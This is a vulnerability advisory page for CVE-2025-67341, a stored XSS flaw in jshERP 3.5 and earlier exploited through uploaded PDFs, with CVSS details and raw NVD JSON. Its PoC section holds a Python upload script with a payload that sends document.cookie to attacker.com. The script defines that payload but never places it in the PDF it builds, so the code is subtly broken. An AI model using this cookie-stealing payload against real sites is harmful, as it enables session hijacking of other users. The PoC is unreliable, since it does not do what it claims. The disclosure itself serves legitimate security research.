Security Vulnerability Report
中文
CVE-2025-67341 CVSS 4.6 MEDIUM

CVE-2025-67341

Published: 2025-12-12 16:15:45
Last Modified: 2025-12-19 20:15:13
Source: [email protected]

Description

jshERP versions 3.5 and earlier are affected by a stored XSS vulnerability. This vulnerability allows attackers to upload PDF files containing XSS payloads. Additionally, these PDF files can be accessed via static URLs, making them accessible to all users.

CVSS Details

CVSS Score
4.6
Severity
MEDIUM
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:U/C:L/I:L/A:N

Configurations (Affected Products)

cpe:2.3:a:jishenghua:jsherp:*:*:*:*:*:*:*:* - VULNERABLE
jshERP <= 3.5

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
# CVE-2025-67341 PoC - jshERP Stored XSS via PDF Upload # Author: Security Researcher # Target: jshERP <= 3.5 import requests import sys # Generate malicious PDF with XSS payload def generate_xss_pdf(): # PDF header pdf_content = b'%PDF-1.4\n' # Malicious XSS payload embedded in PDF xss_payload = '<script>fetch("https://attacker.com/steal?c="+document.cookie)</script>' # Simple PDF with JavaScript action pdf_content += b'1 0 obj<</Type/Catalog/Pages 2 0 R>>endobj\n' pdf_content += b'2 0 obj<</Type/Pages/Kids[3 0 R]/Count 1>>endobj\n' pdf_content += b'3 0 obj<</Type/Page/Parent 2 0 R/MediaBox[0 0 612 792]>>endobj\n' pdf_content += b'xref\n0 4\n0000000000 65535 f\n0000000009 00000 n\n0000000058 00000 n\n0000000115 00000 n\n' pdf_content += b'trailer<</Size 4/Root 1 0 R>>\n' pdf_content += b'startxref\n0\n%%EOF\n' return pdf_content # Upload malicious PDF def exploit(target_url, upload_endpoint): pdf_data = generate_xss_pdf() files = {'file': ('malicious.pdf', pdf_data, 'application/pdf')} try: response = requests.post(upload_endpoint, files=files) if response.status_code == 200: print('[+] Malicious PDF uploaded successfully!') print('[+] Access the PDF at the returned URL to trigger XSS') return True except Exception as e: print(f'[-] Error: {e}') return False if __name__ == '__main__': if len(sys.argv) < 3: print(f'Usage: python {sys.argv[0]} <target_url> <upload_endpoint>') sys.exit(1) exploit(sys.argv[1], sys.argv[2])

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-67341", "sourceIdentifier": "[email protected]", "published": "2025-12-12T16:15:45.150", "lastModified": "2025-12-19T20:15:13.057", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "jshERP versions 3.5 and earlier are affected by a stored XSS vulnerability. This vulnerability allows attackers to upload PDF files containing XSS payloads. Additionally, these PDF files can be accessed via static URLs, making them accessible to all users."}], "metrics": {"cvssMetricV31": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:U/C:L/I:L/A:N", "baseScore": 4.6, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "REQUIRED", "scope": "UNCHANGED", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.1, "impactScore": 2.5}]}, "weaknesses": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-79"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:jishenghua:jsherp:*:*:*:*:*:*:*:*", "versionEndIncluding": "3.5", "matchCriteriaId": "86D8B100-BC9D-41B2-9625-36738A2CF5E5"}]}]}], "references": [{"url": "https://github.com/jishenghua/jshERP/issues/139", "source": "[email protected]", "tags": ["Exploit", "Issue Tracking", "Vendor Advisory"]}]}}
Disclaimer

This information is for security research and authorized penetration testing only. Unauthorized testing of other systems is illegal.